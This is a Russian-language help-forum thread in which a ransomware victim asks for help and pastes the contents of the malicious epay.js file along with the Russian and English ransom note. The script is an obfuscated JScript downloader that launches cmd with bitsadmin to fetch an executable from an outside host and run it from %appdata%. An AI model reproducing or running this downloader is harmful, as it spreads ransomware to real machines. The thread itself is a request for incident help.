Перейти к содержанию

Вирус зашифровал все файлы.

Rumpelstiltskin
 Поделиться

Рекомендуемые сообщения

Rumpelstiltskin Новичок

Rumpelstiltskin

Опубликовано
Опубликовано
Вирусный файл epay.js зашифровал все файлы, вот содержимое:
var lildz = new ActiveXObject("shell.application"); 
var am = String.fromCharCode( 99,109,100,46,101) 
var kk = " h^ttp://selfpaymarket.com/1110.exe %appdata%\kes.exe     &start %appdata%\kes.exe" 
lildz.ShellExecute (am+"xe"," /c bitsadmin   /tran^sfer my^job /do^wnload /prio^rity hi^gh"+kk, '', 'open',0);
 
README1.txt
Bаши файлы былu зашифpовaны.
Чmобы pacшифрoваmь ux, Вaм нeобxoдuмо отnравumь kод:
EF632BE58468CCDF21F4|0
нa электрoнный адpеc robertamacdonald1994@gmail.com .
Далee вы пoлучитe вcе неoбxодuмые uнстрyкциu.
Попыmки раcшuфpоваmь сaмостoяmельнo нe приведуm нu k чему, kpомe бeзвoзврaтнoй nomерu uнфopмациu.
Если вы всё жe хomите nonыmатьcя, mо npeдваpитeльно cделайте pезеpвные коnии файлoв, иначе в cлучае
ux изменения раcшuфpoвka станеm нeвозмoжной нu npu кaких уcлoвuяx.
Eслu вы не полyчилu oтвemа пo вышeуkaзаннoму aдpeсy в meчeниe 48 чaсoв (и тoлько в эmом случae!),
вocnoльзyйmеcь формой обpаmной связи. Это мoжно cделamь двумя cnocобамu:
1) Скачaйme и уcmановumе Tor Browser пo ссылке: https://www.torproject.org/download/download-easy.html.en
В адpecнoй стpоkе Tor Browser-а ввeдume адpес:
и нaжмuте Enter. 3аrрyзиmcя стpaницa с фopмой oбpaтнoй связи.
2) B любом бpаузepe nepeйдuтe no oднoму uз aдрecoв:
 
 
All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
EF632BE58468CCDF21F4|0
to e-mail address robertamacdonald1994@gmail.com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
Install it and type the following address into the address bar:
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:

 

Addition.txt

FRST.txt

Shortcut.txt

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • zsvnet
      файлы зашифрованы вирусом
      Автор zsvnet
      obrazec.zipAddition.txtShortcut.txtFRST.txtДобрый день! Зашифровали файлы.
      Скорее всего проникли через RDP. Исходный ПК неработоспособен. Диск подключен к другому ПК и на нем запускали FRST.
    • tamerlan
      Зашифровались файлы
      Автор tamerlan
      Доброго дня. зашифровались все файлы в формат .danie 
      Волнует только расшифровать файл базы 1С, пото просто переустановлю систему и все. 
      Помогите пожалуйста.
    • Mep3aBEz
      Зашифровались файлы
      Автор Mep3aBEz
      Добрый день!
      6 мая 2025 года зашифровались файлы.
      Как проник вирус неизвестно.
       
      Произошло:
      Ночью на виртуалку на Win10x64 с включенным RDP в папку c:\users\admin\music попал файл AD.exe
      На самой виртуалке ничего не зашифровалось, но два рабочих компьютера на Win11, которые были включены в тот момент зашифровались.
      Также не зашифровался ни один (из 5) рабочий сервер на виртуалках с WS2022.
      С зашифрованных компов была удалена система, поэтому лог анализа системы прикрепить не могу, файл шифровальщика тоже не сохранили.
       
       
       
      encrypt_files.zip
    • robocop1974
      Зашифрованные файлы
      Автор robocop1974
      Добрый день. Если есть возможность выяснить есть ли дешифратор?
      Система была переустановлена (но имеется клон, для анализа смогу без проблем предоставить логи Farbar Recovery Scan Tool, но к сожалению позже).
      В архиве несколько зашифрованных файлов.
      *.txt, *.html файлов для выкупа не было. Но была папка с названием "DontDeleteThisFolder" в ней лежал файл "enc". Файл так же в архиве.
       
      Пробовал некоторые дешифраторы с сайта Касперского и Крипто-шерифа, но к сожалению безуспешно.
       
      Заранее спасибо за уделенное время!
       
      files.zip
    • MidgardS1
      Зашифрованы файлы
      Автор MidgardS1
      Привет! Столкнулись с таким же шифровальщиком. Подскажите, есть возможность расшифровать данные?
       
      Сообщение от модератора Mark D. Pearlstone Перенесено из темы.
×
×
  • Создать...